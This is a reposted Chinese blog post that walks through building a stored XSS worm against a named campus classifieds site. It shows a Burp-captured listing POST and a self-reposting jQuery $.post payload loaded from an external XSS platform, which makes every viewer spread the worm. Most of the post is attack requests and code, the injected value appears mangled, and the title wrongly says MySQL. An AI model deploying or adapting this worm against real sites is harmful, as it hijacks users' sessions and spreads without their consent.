mysql蠕虫攻击_XSS蠕虫攻击案例学习

  • Post author:
  • Post category:mysql


(1)看了下网站基于jQuery,那构造一个xss

worm就简单很多(没有也无所谓,我们自己加载进去也可以的)​

a4c26d1e5885305701be709a3d33442f.png

(2)我们来看看发帖的post动作,我们有burp截取一段数据包看看

POST /info/UserInfo/modifyInfo HTTP/1.1

Host: swust.0xiao.com

……

Cookie: no

‘info_sort_id=178&title=全新红米NOTE手机出售!!!!&content=漏洞测试by:yueyan&pic_path=/Public/upload/info/201404/thumb_534517bb38d6a.jpg

于是我们就构造这样一段ajax_post参数。

具体所涉及知识点请移步到http://www.w3school.com.cn/jquery/ajax_post.asp

[plain] view plaincopy在CODE上查看代码片派生到我的代码片

$.post(“/info/UserInfo/modifyInfo”,{‘info_sort_id’:’178′,’title’:’全新红米NOTE手机出售!!!!’,’content’:’漏洞测试by:yueyan’,’pic_path’:’/Public/upload/info/201404/thumb_534517bb38d6a.jpg”>’,},function(data,

textStaus){alert(‘yueyan’);});

找个xss平台,我这里随便找了个,把上面代码放进去,我这里地址是

[plain] view plaincopy在CODE上查看代码片派生到我的代码片

http://f4ck.org/1111

发帖出去后,一旦有用户登录这个网站,并且查看了该信息,就会触发http://f4ck.org/1111中的代码

[plain] view plaincopy在CODE上查看代码片派生到我的代码片

$.post(“/info/UserInfo/modifyInfo”,{‘info_sort_id’:’178′,’title’:’全新红米NOTE手机出售!!!!’,’content’:’漏洞测试by:yueyan’,’pic_path’:’/Public/upload/info/201404/thumb_534517bb38d6a.jpg”>’,},function(data,

textStaus){alert(‘yueyan’);});

触发后,用户的动作即为发出一个和我发的一样的有xss

worm代码的信息,慢慢的慢慢的就可以传播开了。如图:​

a4c26d1e5885305701be709a3d33442f.png



版权声明:本文为weixin_42721619原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。